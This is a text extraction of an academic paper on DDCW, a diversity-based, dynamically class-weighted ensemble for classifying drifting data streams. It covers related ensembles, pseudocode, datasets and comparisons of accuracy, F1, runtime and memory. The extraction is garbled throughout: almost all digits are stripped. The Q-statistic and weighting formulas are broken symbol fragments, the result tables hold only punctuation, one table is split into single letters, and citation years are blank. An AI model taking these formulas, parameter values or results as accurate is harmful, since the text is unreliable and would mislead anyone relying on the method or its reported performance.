adaptive ensemble size (aes) (olorunnimbe, viktor & paquet, ), which dynamically adapts the ensemble size, or an approach (junior & nicoletti, ), where boosting is applied to the new batches of data and maintains the ensemble by adding the base learners according to the ensemble accuracy rate. learn++ (inspired by adaboost) is an incremental learning ensemble approach consisting of base learners trained on a subset of training data and able to learn the new classes (polikar et al., ). several modifications of this approach exist, focused on improvement of the number of generated ensemble members sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (muhlbaier, topalis & polikar, ). the random forests method is probably the most popular ensemble method on static data at present. its adaptive version for stream classification, adaptive random forests (arf), was introduced in gomes et al. ( ) and has shown a high learning performance on streaming data. more recently, multiple adaptive versions of popular ensemble methods gaining improved performance or achieving speedup in execution have been introduced, e.g., the adaptive extreme gradient boosting method (montiel et al., ), the streaming active deep forest method (luong, nguyen & liew, ), or random forests with an implemented resource-aware elastic swap mechanism (marrón et al., ). all ensemble models work with the assumption of the diversity of the individual classifiers in the ensemble, while the diversity is achieved in different ways. diversity can help in evolving data streams, as the most suitable method may also change as a result of the stream evolution pesaranghader, viktor & paquet ( ). diverse ensembles by themselves cannot guarantee faster recovery from drifts, but can help to reduce the initial increase in error caused by a drift minku, white & yao ( ). there are several ways to achieve diversity in the ensemble. either the classifiers are trained on different data samples, or the model is composed of a set of heterogeneous classifiers. recently, khamassi et al. ( ) studied the influence of diversity techniques (block-based, weighting-data, and filtering-data) on adaptive ensemble models and designed a new ensemble approach that combines the three diversity techniques. the authors in sidhu & bhatia ( ) experimented with a diversified, dynamic weighted majority voting approach consisting of two ensembles (with low and high diversity, achieved by replacing the poisson ( ) with poisson (κ) distribution in online bagging (oza & russell, )). the kappa updated ensemble (kue) cano & krawczyk ( ) trains its base learners using different subsets of features and updates them with new instances with a given probability following a poisson distribution. such an approach results in a higher ensemble diversity and outperforms most of the current adaptive ensembles. however, there are not many studies where the model uses the model diversity score as a criterion for the base classifiers in the ensemble (krawczyk et al. ( )) as opposed to static data processing, where such a complex model exists (lysiak, kurzynski & woloszynski, ). according to yang ( ), diversity correlates with model accuracy. a suitable diversity metric used in ensembles is a paired diversity q statistic (kuncheva, ), which provides information about differences between two base classifiers in the ensemble. another aspect of the ensemble classifiers is the composition of the base classifiers in the model. the most common are homogeneous ensemble methods, which use the same algorithm to train the ensemble members (fernandez-aleman et al., ). on the other hand, heterogeneous approaches are based on the utilization of multiple algorithms to generate ensemble members. such an approach could lead to the creation of more diverse ensembles. for the data stream classification, a heterogeneous ensemble with feature drift for data streams (heft-stream) nguyen et al. ( ) builds a heterogeneous ensemble composed of different online classifiers (e.g., online naive bayes). adaptive modifications of the heterogeneous ensembles were also successfully applied on the sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ drifting data streams (van rijn et al., ; frías-blanco et al., ; van rijn et al., ; idrees et al., ), and many of them proved suitable to address issues such as class imbalance (large, lines & bagnall, ; fernández et al., ; ren et al., ; wang, minku & yao, ; ghaderi zefrehi & altınçay, ). the approach described in this paper aims to combine the construction of the adaptive heterogeneous ensemble with a diversity-based update of the ensemble members. this approach could result in a robust model, with the adaptation mechanism ensuring that newly added members are as diverse as possible during the ensemble updates. maintaining the diversity of the overall model can also lead to a reduction of model updates and therefore faster execution during the run time. ddcw ensemble method in the following section, we introduce the design of the diversified dynamic class weighted (ddcw) ensemble model. the design of the model is based on the assumption that a robust model consists of a collection of heterogeneous base classifiers that are very diverse. when applied to static data, the diversity is used within the ensemble models to tune the combination rule for voting and the aggregation of component classifier predictions. we propose the design of a heterogeneous ensemble model, which combines the dynamic weighting of the ensemble members with the mutual diversity score criterion. the diversity measures are used to rank the members within the ensemble and update their weights according to the diversity value, so the model prefers experts with higher mutual diversity, thereby creating a more robust ensemble. when ranking the base classifiers, the diversity measurement is combined with the lifetime of individual base classifiers in the model. the criterion is expected to cause the importance of the long-lasting base classifiers to gradually fade, which should ensure the relevance of the whole ensemble to evolving and changing data streams. the model is composed of m ensemble members e ,…, em, trained using each chunk of incoming samples in the stream, as depicted in fig. . each of those experts e ,,…, em, have assigned weights for each target class. the weights are tuned after each period (after each chunk is processed) based on individual base classifier performance. first, for each class that a base classifier predicts correctly, the weight is increased. second, after each chunk is processed, the model calculates q pairwise diversity between each of the ensemble members and uses this value to modify model weights. pairwise q diversity metric is calculated as follows (kuncheva & whitaker, ): let z ¼ z ; …; zn be a labeled data set, zj rn coming from the classification problem. the output of a classifier di is an n-dimensional binary vector yi ¼ ½y ;i; …; yn;i�t, such that yj;i ¼ , if di recognizes correctly zj, and otherwise, i ¼ ; …; l. q statistic for two classifiers, di and dk, is then computed as: qi;k ¼ n n �n n n n þn n where n ab is the number of elements zj of z for which yj;i ¼ a and yj;k ¼ b. q varies between − and ; classifiers that tend to recognize the same samples correctly will have positive values of q, and those that commit errors on different objects will render q negative. for statistically independent classifiers, the value of qi,k is . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the value for each member div_ei in ddcw model is obtained as the average of contributions of individual pair diversities and is calculated as follows: div ei ¼ m� pm k¼ ;k ¼i qi;k. then, after each period, the lifetime coefficient ti of each ensemble member is increased. afterwards, the weights of each of the base classifiers are modified using the lifetime coefficient. after this step, the weights are normalized for each class, and a score is calculated for each target class by the classifier predictions. in the last step, the global ensemble model prediction is selected as a target class with the highest score. model weights can be represented as a matrix w m�c , where m is a number of classifiers in the ensemble, and c is a number of target classes in the data. the weights wi,j directly determine the weight given to classifier i for class j as seen in table . in the beginning, the weights are initialized equally, based on the number of classes in the data. during the process, the individual weights for each base classifier and corresponding target class are modified using the parameter β. the weight matrix allows the calculation of the score of the base classifiers, as well as the score of predicted target classes. the score of the classifier is calculated as pc j¼ wi;j for each classifier. this score allows the identification of poorly performing base classifiers in the ensemble. however, the score of the target class is calculated as the contribution of weight wi,j of classifier i and its predicted class j. figure overall scheme of the proposed ensemble model. full-size doi: . /peerj-cs. /fig- table weight matrix. c c … cc classifier score e w , w , … w ,c pc j¼ w ;j e w , w , … w ,c pc j¼ w ;j … … … … … … em wm, wm, … wm,c pc j¼ wm;j sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the weight matrix enables the efficient contribution of each of the ensemble members in building the model. we proceeded from the assumption of having a diverse ensemble. such a model could consist of members, which perform differently in specific target class values, e.g., some of the members are more precise when predicting a particular class than others and vice versa. in that case, we can use a set of classifiers; each of them focused on a different target class (while the distribution of these classes may change over time). the class weighting alone may lead to an ensemble consisting of similar, well-performing models. but the combination of class weighting with diversity measure can lead to a set of balanced members, more focused on specific classes and complementing each other. the proposed ensemble model belongs to the category of passive chunk-based adaptive models. in the presented approach, the size of the model dynamically changes according to the global model performance. the minimum size of the model is set by the parameter k, and the maximum size is set by the parameter l. each base classifier in the ensemble is assigned with a weight vector for each target class. if a new target class appears in the chunk used in training, the new target will be added to the weight vector for each base classifier. initially, the ensemble consists of a randomly initialized set from a list of defined base algorithms (hoeffding tree or naive bayes). other experts can be added in the following periods (interval representing the chunk of arriving data, where base learners and their weights are modified) until the minimum size of the model is reached, i.e., either the model size is smaller than the defined minimum size or the particular member weight falls under the defined threshold. in each iteration, the experts are used to predict the target class of incoming samples in the processed chunk (lines – ). if a prediction of an expert is correct, the weights of the particular expert and target class are multiplied by a coefficient β (line ). in the case period p has occurred, q statistic diversity is calculated for each pair of experts in the ensemble, and the weights of each expert is modified using the particular expert’s diversity (line and ). this mechanism enables the construction of more robust ensembles, by preferring the diverse base models. the weights of base classifiers are also reduced by the exponential value of their lifetime in the ensemble (line ). in this case, the lifetime of the expert represents the number of periods since its addition to the ensemble. the exponential function is used, so the experts are influenced minimally during their initial periods in the ensemble but become more significant for the long-lasting members. this implementation works as a gradual forgetting mechanism of the ensemble model, as the weakest experts are gradually removed from the model and replaced by the new ones. after the update, the weights are normalized for each target class (line ). afterwards, if the maximum size of the model is reached and the global prediction is incorrect, the weakest expert is removed from the ensemble (line ). a new random expert can then be added to the ensemble (lines – ). in each period, all experts where the sum of weights is lower than defined threshold θ are removed from the ensemble. in the end, each sample is weighted by a random uniform value m times, where m represents the actual size of ensemble (line ). each expert is than trained with a new set of incoming sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm diversified dynamic class weighted ensemble. procedure: ddcw({x, y}, p, k, l, α, β, θ) input: data and labels {x, y}, chunk size p, min_experts k, max_experts l, fading factor α, multiplier β, threshold θ output: global predictions g : experts ← create_random_experts(k); : initialize class weights wi,j : for s = ,…,n do : for i = ,…, num_experts(experts) do : local_predictions = classify(expertsi, xs); : if local_predictions = ys then : wi,l = β * wi,l; ← multiply weight of particular expert and target class from local prediction by β : end if : end for : if all samples in a chunk are processed then : local_predictions = classify(experts, x_s); : diversity = calculate_diversity(local_predictions, y_s); : for i = ,…, num_experts(experts) do : expert_lifetime ← increase expert lifetime in each period; : wi = wi – (exp(α * expert_lifetime) – )/ ; : wi = wi ( – diversityi); : end for : end if : for j = ,…,class_labels do : global_predictionsj ← sum(wj); : end for : global_predictions ← argmax(global_predictionsj); : if all samples in chunk are processed then : w ← normalize_weights(w); : if global_predictionss! = ys then : if num_experts(experts) == l then : {experts, w, expert_lifetime} ← remove weakest expert ei based on experts score : end if : if num_experts(experts) < l then : expertsnew ← create_random_expert(); : wnew ← /num_experts(experts); : end if : end if : {experts, w, expert_lifetime} ← remove experts which score is below threshold θ (continued) sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ samples, with individual weights from the last chunk of data (line ). after training, the global predictions of actual samples are retrieved, and the algorithm then continues back to line . datasets description to experimentally evaluate the performance of the presented approach, we decided to use both real-world and synthetically generated datasets. we tried to include multiple drifting datasets that contain different types of concept drift. datasets used in the experiments are summarized in table . real datasets in our study, we used real datasets, including the frequently used elec dataset (harries, ), the kdd challenge dataset (tavallaee et al., ), covtype (blackard, ), the airlines dataset introduced by ikonomovska (http://kt.ijs.si/elena_ ikonomovska/data.html), and data streams from the openml platform bischl et al. ( ) generated from a real-world dataset using a bayesian network generator (bng) van rijn et al. ( ). we included a wide range of datasets to evaluate the performance of the ddcw model on datasets with both binary and multi-class targets or with balanced and imbalanced classes, especially some of them, such as kdd and shuttle are heavily imbalanced. to examine the imbalance degree of the datasets, we included the class ratios in the documentation on the github repository (https://github.com/miso-k/ddcw/ blob/master/classratios.txt). as it is difficult to determine the type of a real drift contained in such data, we tried to estimate and visualize possible drift occurrences. multiple techniques for concept drift visualization exist (pratt & tschapek, ). we used visualization based on feature importance (using the gini impurity) and the respective changes within the datasets, as they may signalize changes in concepts in the data. based on the work described in cassidy & deviney ( ), we used feature importance scores derived from the online random forest model trained on the datasets. such an approach can help to visualize the so-called feature drift, which occurs when certain algorithm (continued) : if num_experts(experts) < k then : expertsnew ← create_random_expert(); : wnew ← /num_experts(experts); : end if : end if : for i = ,…, num_experts(experts) do : sample_weightss ← random_uniform_weight(); : expertsi ← learn_expert(expertsi, xs, ys, sample_weightss); : end for : return global_predictions; : end for sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://kt.ijs.si/elena_ikonomovska/data.html http://kt.ijs.si/elena_ikonomovska/data.html https://github.com/miso-k/ddcw/blob/master/classratios.txt https://github.com/miso-k/ddcw/blob/master/classratios.txt http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ features stop (or start) being relevant to the learning task. fig. shows such visualizations for the real-world datasets used in the experiments. the visualization depicts how the importance of the features changes over time in the data. x-axis represents number of samples, y-axis feature indices and the size of the dots correspond to a feature importance in the given chunk. synthetic datasets besides the real-world datasets, we used synthetic data streams containing generators with various types of drifts. in most cases (except led and stagger data), we used streams of , , samples, with three simulated drifts. we used the agrawal generator (agrawal, imieliński & swami, ) and sea (nick street & kim, ) generators with abrupt and gradual drifts, rbf and waveform streams without any drift and with simulated gradual drift, a stagger concepts generator (schlimmer & granger, ) with abrupt drift, an led (gordon et al., ) stream with gradual drift, and a mixed stream with an abrupt drift with balanced and imbalanced target attributes. table datasets used in the experiments. (dataset type) r: real, s: synthetic. (drift type) a: abrupt, g: gradual, –: none, ?: unknown. dataset drift type dataset type samples features classes elec ? r , kdd ? r , airl ? r , covt ? r , shuttle ? r , powersupply ? r , connect- ? r , bng_bridges ? r , , bng_bridges vsall ? r , , bng_hepatitis ? r , , bng_zoo ? r , , bng_lymph ? r , , agra a s , , agrg g s , , seaa a s , , seag g s , , stagger a s , led g s , mixed_balanced a s , , mixed_imbalanced a s , , rbf – s , , rbf_drift g s , , waveform – s , , waveform_drift g s , , sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experimental results the purpose of the experiments was to determine the performance of the ddcw model in a series of different tests. we used the python implementation of all models, and the experiments were performed using the scikit-multiflow framework (montiel et al., ). all experiments were performed on a virtual server equipped with cpu cores and gb ram. during the first series of experiments, we aimed to examine the impact of the different setting of the chunk-size parameter in which the model is updated and the diversity is figure feature importance progress in the real-world datasets. (a) elec, (b) airlines, (c) kdd , (d) covtype, (e) shuttle, (f) connect- (x axis) number of samples (y axis) feature indices, the size of the dots correspond to a feature importance in the given chunk. full-size doi: . /peerj-cs. /fig- sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ calculated. the model was tested with varying sizes of the chunk, with values set to , , , , , and , samples on all considered datasets. the primary motivation of the experiments was to find the most suitable chunk size parameter for different datasets, which will be used to compare the ddcw with other ensemble models. to evaluate the models, we used prequential evaluation (or interleaved test-then-train evaluation), in which the testing is performed on the new data before they are used to train the model. in the second set of the experiments, the main goal was to compare the performance of the ddcw model with the selected other streaming ensemble-based classifiers. we considered multiple ensemble models: dwm, awe, online boosting, ozabagging, and the currently best performing streaming ensembles such as arf and kue. to analyze the performance of these models, standard classification metrics were used (accuracy, precision, recall, and f ). besides the comparison of the model performance, we measured the metrics related to resource consumption, such as total time required for training, scoring time of an instance, and memory requirements of the models. during these experiments, we set the chunk size to , samples (although we included ddcw with a chunk size of samples for comparison) and set the model’s hyper-parameters to create similar-sized ensemble models (min. and max. members in the ensemble). performance with the different chunk sizes in this experiment, we explored the influence of the chunk window on the classifier’s performance on different datasets. the main goal was to find the optimal chunk window size for a particular dataset. we set different chunk sizes and measured the model performance using selected metrics in defined periods (e.g., every samples). we computed the average model performance on the entire dataset using the above-mentioned classification metrics. a comparison of the ddcw classifier accuracy and f with different sizes of the chunks is shown in table . besides setting the chunk size, we fine-tuned the model hyper-parameters. our main objective was to estimate the suitable combinations of the parameters α, β, and θ. as the experiments were computationally intensive, most of the models were trained using the default hyper-parameter settings, with particular values set to α = . , β = , and θ = . . regarding the model behavior with different hyper-parameter settings, α influences the lifetime of an expert in the ensemble and the speed of degradation of the expert score with increasing lifetime. increasing values led usually to a more dynamic model, able to adapt rapidly, while lower values led to a more stable composition of the model. β influences the preference of the experts, which classified the samples correctly. higher values of this parameter can suppress the poor-performing experts and raise the probability of updating them in the following iteration. θ serves as a threshold for the expert update. lower values usually lead to more weak experts in the ensemble, a marginal contribution to the performance , but raise the model complexity significantly. higher values force the updating of weak experts. however, some of them may be missing later on, after drift occurrence and the reappearance of previous concepts. sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table performance of the ddcw model with different chunk sizes. bold values show the best results. chunk size , accuracy accuracy accuracy accuracy accuracy accuracy elec . . . . . . kdd . . . . . . airl . . . . . . covt . . . . . . shuttle . . . . . . powersuply . . . . . . connect . . . . . . bng_bridges . . . . . . bng_bridges vsall . . . . . . bng_hepatitis . . . . . . bng_zoo . . . . . . bng_lymph . . . . . . agra . . . . . . agrg . . . . . . seaa . . . . . . seag . . . . . . stagger . . . . . . led . . . . . . mixed_balanced . . . . . . mixed_imbalanced . . . . . . rbf . . . . . . rbf_drift . . . . . . waveform . . . . . . waveform_drift . . . . . . f f f f f f elec . . . . . . kdd . . . . . . airl . . . . . . covt . . . . . . shuttle . . . . . . powersuply . . . . . . connect . . . . . . bng_bridges . . . . . . bng_bridges vsall . . . . . . bng_hepatitis . . . . . . bng_zoo . . . . . . bng_lymph . . . . . . agra . . . . . . agrg . . . . . . seaa . . . . . . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the results proved, that the chunk size does have an impact on the model performance, and there are mostly minor differences in the performance metrics with different chunk size parameter setting. although accuracy is not affected much, f metric improves significantly with larger chunk sizes, especially on the bng_zoo and bng_lymph datasets. in general, we can observe, that on the larger data (with more than , samples in the stream), larger windows resulted in slightly better performance. on the other hand, smaller chunk sizes enable the model to react more quickly to concept drift. in some cases, the accuracy metric proved to be not very useful, as the target class is strongly unbalanced or multi-class. it is evident mostly on the kdd or bng_lymph datasets, where high accuracy values are caused mainly by the classification into the majority class, while other minor classes do not influence this metric very much. a much better perspective on the actual model performance could be given by f measure. the experiments summarized averaged results that the models achieved on the entire stream, but it is also important to explore how the performance progressed during the stream processing and observe their reactions to concept drift. figure visualizes the accuracy achieved by the ddcw models on the real datasets with both chunk sizes. the performance of the method with both settings is overall similar; however, we can see a difference in cases when a change (possible drift) occurs. on the kdd dataset, there is a significant decrease in the accuracy of the model after around , samples. shorter chunk windows resulted in a much earlier reaction to the change, without any significant decrease in performance. on the elec and covtype datasets, the earlier reactions are also present and visible, resulting in higher performance metrics. figure depicts the ddcw model performance on the synthetic datasets with both chunk sizes. in the case of stagger and led datasets, the effects of different chunk sizes are comparable with the impact on the real datasets. larger chunk sizes lead to later reactions to drift and a more significant decrease in accuracy. in contrast, performance evaluation on larger streams, such as agr or mixed streams, showed that the chunk size effect on stream processing is different. contrary to previous datasets, larger chunk sizes resulted in a more robust model, still covering some of the previous concepts after table (continued) chunk size , accuracy accuracy accuracy accuracy accuracy accuracy seag . . . . . . stagger . . . . . . led . . . . . . mixed_balanced . . . . . . mixed_imbalanced . . . . . . rbf . . . . . . rbf_drift . . . . . . waveform . . . . . . waveform_drift . . . . . . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure performance of the ddcw model on the real datasets. (a) elec, (b) kdd , (c) airlines, (d) covtype, (e) shuttle, (f) powersupply, (g) connect- , (h) bng bridges, (i) bng bridges vsall, (j) bng hepatitis, (k) bng zoo, (l) bng lymph (y axis) accuracy (x axis) number of samples. full-size doi: . /peerj-cs. /fig- sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure performance of the ddcw model on the synthetic datasets. (a) agr_a, (b) agr_g, (c) sea_a, (d) sea_g, (e) stagged, (f) led, (g) mixed-balanced, (h) mixed-imbalanced, (i) rbf, (j) rbf drift, (k) waveform, (l) waveform drift (y axis) accuracy (x axis) number of samples. full-size doi: . /peerj-cs. /fig- sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ drift occurrence. after the drift, the model performance dropped significantly. when using larger chunk sizes, the model was able to use more data to update the ensemble, which led to improved performance. figure depicts the size of the ensemble during stream processing on selected datasets with the diversity of the ensemble members disabled and enabled. during the experiments, we set the minimum size of the ddcw ensemble to and the maximum size to . initially, we performed a set of tests to estimate the optimal ensemble size. larger ensembles did not perform significantly better, while the computational complexity of the model was considerably higher. the experiments proved that, during the run time, the algorithm preferred a smaller pool of ensemble members. the algorithm added more ensemble members when a concept drift occurred. enabling the diversity-based selection of experts resulted in a more stable composition of the ensemble and required fewer member updates. comparison with other ensemble models in these experiments, we compared the ddcw model performance with the selected ensemble models. in the comparison, we included awe, dwm, online boosting, ozabagging, arf, and kue models. each of the ensemble models was tested with different base learners. we evaluated naive bayes, hoeffding tree, and k-nn as base learners. similar to the previous set of experiments, we used the accuracy, precision, recall, figure size of the ddcw ensemble during the run-time on the selected datasets. (a) airlines, (b) covtype, (c) stagger, (d) agr_a (y axis) number of ensemble members (x axis) number of samples. full-size doi: . /peerj-cs. /fig- sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and f metrics for comparison purposes computed in the prequential fashion. when using the ddcw model, we included the ddcw model with a combination of naive bayes and hoeffding trees as base learners, as well as a tree-based homogeneous ensemble alone. performance comparison to summarize the experiments, table compares the performance of all evaluated models on the real datasets and table provides the similar comparison on the synthetic data streams. as in the previous experiments, the tables consists of overall averaged results that the models achieved on the entire stream. while most of the studies focus only on a comparison of accuracy, we decided to analyze other classification metrics as well. especially in the case of multi-class or heavily imbalanced data (e.g., kdd ), accuracy might not be the best choice to truly evaluate the performance of the model, therefore we choose also f metric as well. please note, that we were unable to properly obtain f values from the kue model on some of the datasets. the ddcw model proved to be suitable for data streams with different concept drifts and either binary or multi-class classification tasks. when considering the composition of the ddcw ensemble, the fact that the model relies on different base learners enables it to utilize the strengths of particular learners. dynamic composition of the ensemble table comparison of accuracy and f metrics of evaluated ensemble models on the real data streams. ddcwht ddcwhtnb dwmnb awenb dwmht aweht obknn ozaknn obht ozaht obnb ozanb arfht kueht accuracy elec . . . . . . . . . . . . . . kdd . . . . . . . . . . . . . . airl . . . . . . . . . . . . . . covt . . . . . . . . . . . . . . shuttle . . . . . . . . . . . . . . powersuply . . . . . . . . . . . . . . connect . . . . . . . . . . . . . . bng_bridges . . . . . . . . . . . . . . bng_bridges vsall . . . . . . . . . . . . . . bng_hepatitis . . . . . . . . . . . . . . bng_zoo . . . . . . . . . . . . . . bng_lymph . . . . . . . . . . . . . . f elec . . . . . . . . . . . . . . kdd . . . . . . . . . . . . . nan airl . . . . . . . . . . . . . nan covt . . . . . . . . . . . . . nan shuttle . . . . . . . . . . . . . nan powersuply . . . . . . . . . . . . . nan connect . . . . . . . . . . . . . . bng_bridges . . . . . . . . . . . . . . bng_bridges vsall . . . . . . . . . . . . . . bng_hepatitis . . . . . . . . . . . . . . bng_zoo . . . . . . . . . . . . . . bng_lymph . . . . . . . . . . . . . . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ enables it to adapt to the particular stream by preferring a base learner that is more suitable for the given data. in general, the ddcw performs very well on the generated streams, gaining at least competitive results compared to the other models on the real-world datasets. the method appears to struggle more with some of the imbalanced datasets, as is apparent from the f results achieved on the kdd or airlines dataset. during this experiment, we also used two different ddcw method setups to compare the effect of the base learner selection. we used ddcw with only hoeffding trees as a base learner and ddcw with a combination of naive bayes and hoeffding trees. although the homogeneous ensemble mostly performed slightly better, the heterogeneous one was usually faster to train and score and maintained a similar performance, which was a result of the inclusion of fast naive bayes ensemble members. in a similar fashion, we experimented with an integration of k-nn into the ddcw model, but as expected, k-nn base learners raised the resource requirements of the model and failed to provide a sufficient performance boost, so we did not include k-nn base learners in further experiments. performance comparison showed that the ddcw method can produce results that are comparable to the related ensemble models on both, real and synthetic streams. in many table comparison of accuracy and f metrics of evaluated ensemble models on the synthetic data streams. ddcwht ddcwhtnb dwmnb awenb dwmht aweht obknn ozaknn obht ozaht obnb ozanb arfht kueht accuracy agra . . . . . . . . . . . . . . agrg . . . . . . . . . . . . . . seaa . . . . . . . . . . . . . . seag . . . . . . . . . . . . . . stgr . . . . . . . . . . . . . . led . . . . . . . . . . . . . . mixed_balanced . . . . . . . . . . . . . . mixed_imbalanced . . . . . . . . . . . . . . rbf . . . . . . . . . . . . . . rbf_drift . . . . . . . . . . . . . . waveform . . . . . . . . . . . . . . waveform_drift . . . . . . . . . . . . . . f agra . . . . . . . . . . . . . . agrg . . . . . . . . . . . . . . seaa . . . . . . . . . . . . . . seag . . . . . . . . . . . . . . stgr . . . . . . . . . . . . . . led . . . . . . . . . . . . . . mixed_balanced . . . . . . . . . . . . . . mixed_imbalanced . . . . . . . . . . . . . . rbf . . . . . . . . . . . . . . rbf_drift . . . . . . . . . . . . . . waveform . . . . . . . . . . . . . . waveform_drift . . . . . . . . . . . . . . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cases, it is able to outperform existing algorithms (e.g., awe, dwm, oza, and ob) in both of the explored metrics. current state-of-the-art methods such as kue and arf usually produce slightly better results, but the ddcw method showed a fairly competitive performance, surpassing on several datasets one of those methods in both, accuracy and f scores. however, the evaluation metrics represent only one aspect of the adaptive models’ performance. during the experiments, we tried to evaluate another aspect of the studied models that may influence the run time of the models during deployment in real-world scenarios. we focused mostly on monitoring the model performance in terms of their demand on resources and resource consumption during the process. during the experiments, we collected data about the overall run-time aspects of the model. the following section compares the models from the perspective of training/scoring times and memory requirements. training time and memory usage we analyzed the training and scoring times and the memory consumption during the training process to provide a different view of the models’ performance, comparing performance metrics with resource consumption requirements. we measured the overall training and scoring times on the entire data by summing up all partial re-training and scoring times over the stream. table summarizes the results of all evaluated models. the table compares the total training time consumed in the training and re-training of the models, the total scoring time of all processed instances, and the average size of the model in memory during the entire stream processing. the results represent an averaged value of the total of five separate runs of each experiment. it is important to note that the kue model was not included in this comparison. we used python implementations of all evaluated models and the scikit-multiflow library during the experiments. the kue model was available only in its java implementation using the moa library, therefore using different underlying technologies could influence the objective comparison of resource consumption. at the same time, it is essential to note that the java implementation of the kue model was significantly effective than all python-based models, mostly in training times, which were remarkably shorter. the choice of a base classifier heavily influences the overall run-time requirements of all models. most apparently, the choice of k-nnadwin as a base learner for onlinebagging and ozabagging methods leads to a massive increase of memory consumption and data processing times. nearest neighbor classifiers require to store the training data in memory, which could lead to increased memory consumption and therefore increased training times. on the other hand, ensembles which consist of naive bayes and hoeffding tree classifiers as the base learners are much faster to train and require significantly lower memory during the run-time. however, online boosting and ozabagging methods are much more sensitive to the number of features of the processed data. it can be observed on kdd and covtype datasets, where these relatively faster models, required significantly longer times to either train or score the instances. ddcw ensemble training time and memory consumption requirements reflect the fact that the model consists of a mixture of hoeffding tree and naive bayes classifiers. when experimenting with the homogeneous sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t ab le c o m p ar is o n o f av er ag e to ta l tr ai n in g an d sc o ri n g ti m es (i n se co n d s) an d av er ag e m o d el si ze in m em o ry (i n k b ). d d c w h t d d c w h t n b d w m n b a w e n b d w m h t a w e h t o b k n n o za k n n o b h t o za h t o b n b o za n b a r f h t t ra in e l e c . . . . . . . . , . . , . . . k d d , . , . . . , . , . , . , . , . , . , . , . , . a ir l , . , . . . . , . , . , . , . , . , . . , . c o v t . . . , . , . , . , . , . , . , . , . , . , . sh u t t l e . . . . . . , . . , . . . . . p o w e r su p l y . . . . . . , . . , . . , . . . c o n n e c t . . . , . . , . , . , . , . . , . . , . b n g _ b r id g e s , . , . , . , . , . , . , . , . , . , . , . . , . b n g _ b r id g e s vs a ll , . , . , . , . , . , . , . , . , . , . , . . , . b n g _ h e p a t it is , . , . , . , . , . , . , . , . , . , . , . , . , . b n g _ z o o , . , . . , . , . , . , . , . , . , . , . . , . b n g _ l y m p h , , . . . . , . . , . . , . , . , . a g r a , . , . , . , . , . , . , . , . , . , . , . . , . a g r g , . , . , . , . , . , . , . , . , . , . , . . , . se a a , . , . . , . . , . , . , . , . . , . . , . se a g , . , . . , . . , . , . , . , . . , . . , . st g r . . . . . . , . , . , . . , . . . l e d , . , . , , , . , . , , , . , . , . . , . m ix e d _ b a l a n c e d , . , . . , . . , . , . , . , . , . , . . , . m ix e d _ im b a l a n c e d , . , . . , . , . , . , . , . , . , . , . . , . r b f , . , . , . , . , . , . , . , . , . , . , . . , . r b f _ d r if t , . , . , . , . , . , . , . , . , . , . , . . , . w a v e f o r m , . , . , . , . , . , . , . , . , . , . , . , . , . w a v e f o r m _ d r if t , . , . , . , . , . , . , . , . , . , . , . , . , . sc o ri n g e l e c . . . . . . . . . . . . . k d d . , . . . , . . , . , . , . , . , . , . . a ir l . . . . . . . . . , . . . . c o v t . . . . , . , . , . , . , , . , . , . , . sh u t t l e . . . . . . . . . . . . . p o w e r su p l y . . . . . . . . . . . . c o n n e c t . . . . . . , . , . . . . . . b n g _ b r id g e s , . , . , . , . , . , . , . , . , . , . , . , . , . b n g _ b r id g e s vs a ll , . , . . , . , . , . , . , . , . , . , . , . , . b n g _ h e p a t it is , . , . , . , . , . , . , . , . , . , . , . , . , . b n g _ z o o , . , . . , . , . , . , . , . , . , . , . , . . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ t ab le (c o n ti n u ed ) d d c w h t d d c w h t n b d w m n b a w e n b d w m h t a w e h t o b k n n o za k n n o b h t o za h t o b n b o za n b a r f h t b n g _ l y m p h , . , . . . . . . . . . , . , . . a g r a . . . , . . , . , . , . , . , . , . , . , . a g r g . , . . . . , . , . , . , . , . , . , . , . se a a . . . . . . , . , . . . . . . se a g . . . . . . , . , . . . . . . st g r . 